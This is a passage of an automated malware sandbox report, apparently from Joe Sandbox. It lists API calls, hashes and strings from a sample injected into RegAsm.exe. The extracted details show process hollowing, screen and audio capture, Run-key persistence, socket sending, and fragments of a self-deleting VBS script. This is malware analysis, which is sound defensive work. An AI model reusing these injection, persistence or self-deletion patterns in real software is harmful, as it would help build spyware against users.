                                  • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                  • Instruction Fuzzy Hash: C8516A21E01A4496DB38892964D67BF67A99B1E304F18390FE443CB7C2C64DED06C35E
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                                  • Instruction ID: 96b5c22f40dc969dc1399d427f9382315b517a9523814fa291cced01a0c32d8b
                                  • Opcode Fuzzy Hash: 628fd2d23e3b9e8eddda9414cca102861cb20c2ab21f2c1c82199380d97b1b87
                                  • Instruction Fuzzy Hash: 5B617E72A083059FC304DF35D581A5FB7E5AFCC318F510E2EF499D6151EA35EA088B86
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction ID: 78f0f7b5b7642c22d8ee35c169576c4e0068381375f86828a5140fd971b96714
                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction Fuzzy Hash: 9311E6BB24034143D6088A2DCCB85B7E797EADD321F7D626FF0424B758DB2AA9459608
                                  APIs
                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                    • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                  • DeleteDC.GDI32(00000000), ref: 00418F2A
                                  • DeleteDC.GDI32(00000000), ref: 00418F2D
                                  • DeleteObject.GDI32(00000000), ref: 00418F30
                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                  • DeleteDC.GDI32(00000000), ref: 00418F62
                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                  • GetIconInfo.USER32(?,?), ref: 00418FBD
                                  • DeleteObject.GDI32(?), ref: 00418FEC
                                  • DeleteObject.GDI32(?), ref: 00418FF9
                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                  • DeleteDC.GDI32(?), ref: 0041917C
                                  • DeleteDC.GDI32(00000000), ref: 0041917F
                                  • DeleteObject.GDI32(00000000), ref: 00419182
                                  • GlobalFree.KERNEL32(?), ref: 0041918D
                                  • DeleteObject.GDI32(00000000), ref: 00419241
                                  • GlobalFree.KERNEL32(?), ref: 00419248
                                  • DeleteDC.GDI32(?), ref: 00419258
                                  • DeleteDC.GDI32(00000000), ref: 00419263
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                  • String ID: DISPLAY
                                  • API String ID: 479521175-865373369
                                  • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                  • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                  • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                  • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                  APIs
                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                  • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                  • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                  • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                  • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                  • ResumeThread.KERNEL32(?), ref: 00418435
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                  • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                  • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                  • GetLastError.KERNEL32 ref: 0041847A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                  • API String ID: 4188446516-3035715614
                                  • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                  • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                  • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                  • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                  APIs
                                    • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                    • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                    • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                    • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                  • ExitProcess.KERNEL32 ref: 0040D7D0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                  • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 1861856835-332907002
                                  • Opcode ID: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                                  • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                  • Opcode Fuzzy Hash: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                                  • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                  APIs
                                    • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                    • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                    • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                    • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                    • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,6D3B8300,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                  • ExitProcess.KERNEL32 ref: 0040D419
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                  • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                  • API String ID: 3797177996-2557013105
                                  • Opcode ID: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                                  • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                  • Opcode Fuzzy Hash: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                                  • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                  • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                  • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                  • GetCurrentProcessId.KERNEL32 ref: 00412541
                                  • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                  • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                    • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                  • Sleep.KERNEL32(000001F4), ref: 00412682
                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                  • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                  • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                  • String ID: .exe$8SG$WDH$exepath$open$temp_
                                  • API String ID: 2649220323-436679193
                                  • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                  • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                  • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                  • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                  APIs
                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                  • SetEvent.KERNEL32 ref: 0041B219
                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                  • CloseHandle.KERNEL32 ref: 0041B23A
                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                  • API String ID: 738084811-2094122233
                                  • Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                                  • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                  • Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                                  • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Write$Create
                                  • String ID: RIFF$WAVE$data$fmt
                                  • API String ID: 1602526932-4212202414
                                  • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                  • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                  • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                  • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                  APIs
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                  • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                  • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                  • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                  • API String ID: 1646373207-255920310
                                  • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                  • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                  • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                  • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                  APIs
                                  • _wcslen.LIBCMT ref: 0040CE07
                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                  • _wcslen.LIBCMT ref: 0040CEE6
                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CF84
                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                  • _wcslen.LIBCMT ref: 0040CFC6
                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                  • ExitProcess.KERNEL32 ref: 0040D062
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                  • API String ID: 1579085052-2309681474
                                  • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                  • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                  • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                  • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                  APIs
                                  • lstrlenW.KERNEL32(?), ref: 0041C036
                                  • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                  • lstrlenW.KERNEL32(?), ref: 0041C067
                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                  • _wcslen.LIBCMT ref: 0041C13B
                                  • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                  • GetLastError.KERNEL32 ref: 0041C173
                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                  • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                  • GetLastError.KERNEL32 ref: 0041C1D0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                  • String ID: ?
                                  • API String ID: 3941738427-1684325040
                                  • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                  • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                  • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                  • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$EnvironmentVariable$_wcschr
                                  • String ID:
                                  • API String ID: 3899193279-0
                                  • Opcode ID: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                  • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                  • Opcode Fuzzy Hash: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                  • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                    • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,6D3B8300,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                    • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                    • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                  • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                  • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                  • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                  • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                  • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                  • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                  • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                  • Sleep.KERNEL32(00000064), ref: 00412E94
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                  • String ID: /stext "$0TG$0TG$NG$NG
                                  • API String ID: 1223786279-2576077980
                                  • Opcode ID: bc7e362d57d7670180143ae5cce880ef26dc034d902ff58de5e25bf17600ed29
                                  • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                  • Opcode Fuzzy Hash: bc7e362d57d7670180143ae5cce880ef26dc034d902ff58de5e25bf17600ed29
                                  • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                  APIs
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                  • LoadLibraryA.KERNEL32(?), ref: 00414E17
